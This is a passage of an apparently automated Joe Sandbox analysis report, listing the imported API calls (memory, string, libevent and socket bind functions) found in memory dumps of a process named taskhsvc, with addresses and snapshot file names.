    • abort.MSVCRT ref: 002876E2
    • event_add.LIBEVENT-2-0-5 ref: 00287713
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 0031B0D5
    • __stack_chk_fail.LIBSSP-0 ref: 0031B24B
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 0031B114
    • strlen.MSVCRT ref: 0031B140
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • memcpy.MSVCRT ref: 0031B1E5
    • memcpy.MSVCRT ref: 0031B215
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 002E053F: strlen.MSVCRT ref: 002E05C4
      • Part of subcall function 002E053F: abort.MSVCRT ref: 002E094B
      • Part of subcall function 002E053F: abort.MSVCRT ref: 002E0A3E
      • Part of subcall function 002E053F: strcmp.MSVCRT ref: 002E0A56
      • Part of subcall function 002E053F: __stack_chk_fail.LIBSSP-0 ref: 002E0E2A
      • Part of subcall function 0031FB67: abort.MSVCRT ref: 0031FBC3
      • Part of subcall function 0031FB67: abort.MSVCRT ref: 0031FC02
      • Part of subcall function 0031FB67: abort.MSVCRT ref: 0031FC41
      • Part of subcall function 0031FB67: abort.MSVCRT ref: 0031FCEC
      • Part of subcall function 0031FB67: __stack_chk_fail.LIBSSP-0 ref: 0031FD78
      • Part of subcall function 0031FA81: abort.MSVCRT ref: 0031FAD7
      • Part of subcall function 0031FA81: abort.MSVCRT ref: 0031FB16
      • Part of subcall function 0031FA81: __stack_chk_fail.LIBSSP-0 ref: 0031FB60
    • free.MSVCRT ref: 002BFC97
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A95C
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A99A
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A9DE
      • Part of subcall function 0031A905: __stack_chk_fail.LIBSSP-0 ref: 0031AA35
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C166E
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C1698
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C16DA
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C1731
      • Part of subcall function 002C13B7: free.MSVCRT ref: 002C178E
      • Part of subcall function 002C13B7: __stack_chk_fail.LIBSSP-0 ref: 002C17A8
    • free.MSVCRT ref: 002BFE2B
      • Part of subcall function 0031FF4B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,002BFE7E), ref: 00320007
      • Part of subcall function 0031FF4B: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,002BFE7E), ref: 0032002B
      • Part of subcall function 0031FF4B: __stack_chk_fail.LIBSSP-0 ref: 00320045
    • __stack_chk_fail.LIBSSP-0 ref: 002BFFCF
      • Part of subcall function 002B3F06: abort.MSVCRT ref: 002B3F62
      • Part of subcall function 002B3F06: __stack_chk_fail.LIBSSP-0 ref: 002B3F72
      • Part of subcall function 0031FA42: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002BFBC0), ref: 0031FA7A
      • Part of subcall function 002B2B73: __stack_chk_fail.LIBSSP-0 ref: 002B2C58
      • Part of subcall function 0033479D: __stack_chk_fail.LIBSSP-0 ref: 0033481C
      • Part of subcall function 002BEC52: __stack_chk_fail.LIBSSP-0 ref: 002BEC82
    • free.MSVCRT ref: 002BFF60
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 002BFFD6: strerror.MSVCRT ref: 002C005A
      • Part of subcall function 002BFFD6: strerror.MSVCRT ref: 002C026C
      • Part of subcall function 002BFFD6: __stack_chk_fail.LIBSSP-0 ref: 002C0321
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002E3AE2: abort.MSVCRT ref: 002E3B68
      • Part of subcall function 002E3AE2: abort.MSVCRT ref: 002E3BBD
      • Part of subcall function 002E3AE2: __stack_chk_fail.LIBSSP-0 ref: 002E3BD0
    • __stack_chk_fail.LIBSSP-0 ref: 002E6A44
      • Part of subcall function 002E566D: abort.MSVCRT ref: 002E56DD
      • Part of subcall function 002E566D: abort.MSVCRT ref: 002E572A
      • Part of subcall function 002E566D: abort.MSVCRT ref: 002E577F
      • Part of subcall function 002E566D: free.MSVCRT ref: 002E5D20
      • Part of subcall function 002E566D: free.MSVCRT ref: 002E5D42
      • Part of subcall function 002E566D: __stack_chk_fail.LIBSSP-0 ref: 002E5E18
    • free.MSVCRT ref: 002E69C6
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 002E69FE
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E40F9
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E4122
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E4145
      • Part of subcall function 002E40B6: __stack_chk_fail.LIBSSP-0 ref: 002E4167
      • Part of subcall function 002E5E1F: abort.MSVCRT ref: 002E5EB5
      • Part of subcall function 002E5E1F: abort.MSVCRT ref: 002E5F0A
      • Part of subcall function 002E5E1F: strcmp.MSVCRT ref: 002E5F50
      • Part of subcall function 002E5E1F: free.MSVCRT ref: 002E5F72
      • Part of subcall function 002E5E1F: __stack_chk_fail.LIBSSP-0 ref: 002E6077
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 002E6AAF
    • abort.MSVCRT ref: 002E6B04
    • __stack_chk_fail.LIBSSP-0 ref: 002E6B81
      • Part of subcall function 002E62A9: abort.MSVCRT ref: 002E6320
      • Part of subcall function 002E62A9: abort.MSVCRT ref: 002E6375
      • Part of subcall function 002E62A9: free.MSVCRT ref: 002E6448
      • Part of subcall function 002E62A9: __stack_chk_fail.LIBSSP-0 ref: 002E646D
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • abort.MSVCRT ref: 001E35A1
    • memset.MSVCRT ref: 001E35BC
    • __stack_chk_fail.LIBSSP-0 ref: 001E35CF
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 002877D7
      • Part of subcall function 003EC2B0: abort.MSVCRT ref: 003EC2FD
      • Part of subcall function 003EC2B0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1AEF), ref: 003EC312
    • event_new.LIBEVENT-2-0-5 ref: 00287805
    • __stack_chk_fail.LIBSSP-0 ref: 00287861
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 00287850
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 003212DB
    • realloc.MSVCRT ref: 003212FA
    • __stack_chk_fail.LIBSSP-0 ref: 0032134E
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • exit.MSVCRT ref: 0032133B
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00318F86
    • localtime.MSVCRT ref: 00318F91
    • memcpy.MSVCRT ref: 00318FB4
      • Part of subcall function 00318C53: memset.MSVCRT ref: 00318E92
      • Part of subcall function 00318C53: strerror.MSVCRT ref: 00318EAA
      • Part of subcall function 00318C53: __stack_chk_fail.LIBSSP-0 ref: 00318F24
    • __stack_chk_fail.LIBSSP-0 ref: 00318FE5
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 003210D1
    • malloc.MSVCRT ref: 003210E9
    • __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • exit.MSVCRT ref: 0032112A
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 0032143E
    • _strdup.MSVCRT ref: 00321449
    • __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • exit.MSVCRT ref: 0032148A
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
    • strcmp.MSVCRT ref: 001EE905
      • Part of subcall function 0032DA95: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002564FC), ref: 0032DAE3
    • __stack_chk_fail.LIBSSP-0 ref: 001EEBD6
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001EEA71
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 0032B7BA: memset.MSVCRT ref: 0032B7F8
      • Part of subcall function 0032B7BA: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001EEAEA), ref: 0032B8FC
      • Part of subcall function 0032DFE3: __stack_chk_fail.LIBSSP-0 ref: 0032E043
    • free.MSVCRT ref: 001EEB46
    • free.MSVCRT ref: 001EEB67
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 001EB015: bind.WS2_32 ref: 001EB3B3
      • Part of subcall function 001EB015: abort.MSVCRT ref: 001EB5FE
      • Part of subcall function 001EB015: memcpy.MSVCRT ref: 001EB6C7
      • Part of subcall function 001EB015: abort.MSVCRT ref: 001EB862
      • Part of subcall function 001EB015: __stack_chk_fail.LIBSSP-0 ref: 001EB8E9
      • Part of subcall function 001EAD69: __stack_chk_fail.LIBSSP-0 ref: 001EAE0F
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00319ED4: __stack_chk_fail.LIBSSP-0 ref: 00319F7B
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A95C
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A99A
      • Part of subcall function 0031A905: abort.MSVCRT ref: 0031A9DE
      • Part of subcall function 0031A905: __stack_chk_fail.LIBSSP-0 ref: 0031AA35
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 0024DB99
      • Part of subcall function 00241D3F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,0024DBC0), ref: 00241D66
    • __stack_chk_fail.LIBSSP-0 ref: 0024DE68
      • Part of subcall function 00241CFF: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0024DBD1), ref: 00241D38
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0032BBAB: memset.MSVCRT ref: 0032BBD7
      • Part of subcall function 0032BBAB: __stack_chk_fail.LIBSSP-0 ref: 0032BBF0
    • memcpy.MSVCRT ref: 0024DD2D
    • memcpy.MSVCRT ref: 0024DD5A
      • Part of subcall function 00316107: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161A4
      • Part of subcall function 00316107: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161B7
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D854
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D893
      • Part of subcall function 0032D7F2: memcpy.MSVCRT ref: 0032D8AD
      • Part of subcall function 0032D7F2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F57C7), ref: 0032D8C0
    • memcpy.MSVCRT ref: 0024DDF6
      • Part of subcall function 00315895: strlen.MSVCRT ref: 003158CA
      • Part of subcall function 00315895: __stack_chk_fail.LIBSSP-0 ref: 00315904
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 0032DFE3: __stack_chk_fail.LIBSSP-0 ref: 0032E043
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 0031FBC3
    • abort.MSVCRT ref: 0031FC02
    • abort.MSVCRT ref: 0031FC41
      • Part of subcall function 0031E576: memcpy.MSVCRT ref: 0031E5AA
      • Part of subcall function 0031E576: __stack_chk_fail.LIBSSP-0 ref: 0031E5BB
      • Part of subcall function 0031DEF4: memset.MSVCRT ref: 0031DFEF
      • Part of subcall function 0031DEF4: memset.MSVCRT ref: 0031E0F6
      • Part of subcall function 0031DEF4: __stack_chk_fail.LIBSSP-0(?), ref: 0031E1CC
      • Part of subcall function 0031C60C: __stack_chk_fail.LIBSSP-0 ref: 0031C643
      • Part of subcall function 0031DA66: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,0031FCAF), ref: 0031DAF3
    • __stack_chk_fail.LIBSSP-0 ref: 0031FD78
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 0031FCEC
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0031E650: memcpy.MSVCRT ref: 0031E684
      • Part of subcall function 0031E650: __stack_chk_fail.LIBSSP-0 ref: 0031E695
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 0031F1F0
    • abort.MSVCRT ref: 0031F22F
    • abort.MSVCRT ref: 0031F26E
      • Part of subcall function 0031E52A: memcpy.MSVCRT ref: 0031E55E
      • Part of subcall function 0031E52A: __stack_chk_fail.LIBSSP-0 ref: 0031E56F
      • Part of subcall function 0031D513: memset.MSVCRT ref: 0031D60E
      • Part of subcall function 0031D513: memset.MSVCRT ref: 0031D715
      • Part of subcall function 0031D513: __stack_chk_fail.LIBSSP-0(?), ref: 0031D7EB
      • Part of subcall function 0031C580: __stack_chk_fail.LIBSSP-0 ref: 0031C5B7
      • Part of subcall function 0031D085: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,0031D164), ref: 0031D112
    • __stack_chk_fail.LIBSSP-0 ref: 0031F3A5
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 0031F319
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0031E604: memcpy.MSVCRT ref: 0031E638
      • Part of subcall function 0031E604: __stack_chk_fail.LIBSSP-0 ref: 0031E649
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00233770: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002578D1), ref: 0023379C
      • Part of subcall function 002B6941: __stack_chk_fail.LIBSSP-0 ref: 002B69E5
      • Part of subcall function 00249522: abort.MSVCRT ref: 00249572
      • Part of subcall function 00249522: __stack_chk_fail.LIBSSP-0 ref: 002495A9
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 002C1874: __stack_chk_fail.LIBSSP-0 ref: 002C1911
      • Part of subcall function 003081DD: __stack_chk_fail.LIBSSP-0 ref: 0030826A
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 002376EC
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00223659: __stack_chk_fail.LIBSSP-0 ref: 002236FF
      • Part of subcall function 00276C11: abort.MSVCRT ref: 00276C61
      • Part of subcall function 00276C11: __stack_chk_fail.LIBSSP-0 ref: 00276C85
      • Part of subcall function 00276D83: abort.MSVCRT ref: 00276DD3
      • Part of subcall function 00276D83: __stack_chk_fail.LIBSSP-0 ref: 00276DF7
    • free.MSVCRT ref: 001DCB5D
    • __stack_chk_fail.LIBSSP-0 ref: 001DCB92
      • Part of subcall function 0026DD89: abort.MSVCRT ref: 0026DDDB
      • Part of subcall function 0026DD89: __stack_chk_fail.LIBSSP-0 ref: 0026DFCD
      • Part of subcall function 002FED64: abort.MSVCRT ref: 002FEDC3
      • Part of subcall function 002FED64: abort.MSVCRT ref: 002FEE06
      • Part of subcall function 002FED64: abort.MSVCRT ref: 002FEE91
      • Part of subcall function 002FED64: free.MSVCRT ref: 002FEEC9
      • Part of subcall function 002FED64: free.MSVCRT ref: 002FF023
      • Part of subcall function 002FED64: __stack_chk_fail.LIBSSP-0 ref: 002FF03D
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001F0A3E
      • Part of subcall function 001E3DED: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1825), ref: 001E3E14
      • Part of subcall function 001F0D83: abort.MSVCRT ref: 001F12C4
      • Part of subcall function 001F0D83: __stack_chk_fail.LIBSSP-0 ref: 001F1529
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
      • Part of subcall function 00212830: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001F2084), ref: 0021288C
      • Part of subcall function 00212830: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,001F2084), ref: 00212932
      • Part of subcall function 002FA2E7: __stack_chk_fail.LIBSSP-0 ref: 002FA438
      • Part of subcall function 0031919B: strerror.MSVCRT ref: 003191ED
      • Part of subcall function 0031919B: __stack_chk_fail.LIBSSP-0 ref: 003191FD
      • Part of subcall function 001E8860: abort.MSVCRT ref: 001E88CA
      • Part of subcall function 001E8860: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001E9EDC), ref: 001E88DD
      • Part of subcall function 00216D57: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,001C2F3A), ref: 00216DA7
      • Part of subcall function 00216D57: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001C2F3A), ref: 00216DE3
    • __stack_chk_fail.LIBSSP-0 ref: 001F0D39
      • Part of subcall function 001E88E4: abort.MSVCRT ref: 001E893A
      • Part of subcall function 001E88E4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA517), ref: 001E894D
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EA9F9
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EAA3B
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EAA7A
      • Part of subcall function 001EA98A: time.MSVCRT ref: 001EABA2
      • Part of subcall function 001EA98A: __stack_chk_fail.LIBSSP-0 ref: 001EABBD
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001E378D: abort.MSVCRT ref: 001E37E0
      • Part of subcall function 001E378D: __stack_chk_fail.LIBSSP-0 ref: 001E381F
      • Part of subcall function 001E34DB: abort.MSVCRT ref: 001E35A1
      • Part of subcall function 001E34DB: memset.MSVCRT ref: 001E35BC
      • Part of subcall function 001E34DB: __stack_chk_fail.LIBSSP-0 ref: 001E35CF
      • Part of subcall function 0033084A: __stack_chk_fail.LIBSSP-0 ref: 00330886
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E4145
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E41C6
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E419E
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325D72
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325DB1
      • Part of subcall function 00325CFA: abort.MSVCRT ref: 00325DF6
      • Part of subcall function 00325CFA: strerror.MSVCRT ref: 00325ECF
      • Part of subcall function 00325CFA: strerror.MSVCRT ref: 00325F30
      • Part of subcall function 00325CFA: _close.MSVCRT ref: 00325F8C
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FB5
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FDD
      • Part of subcall function 00325CFA: free.MSVCRT ref: 00325FFF
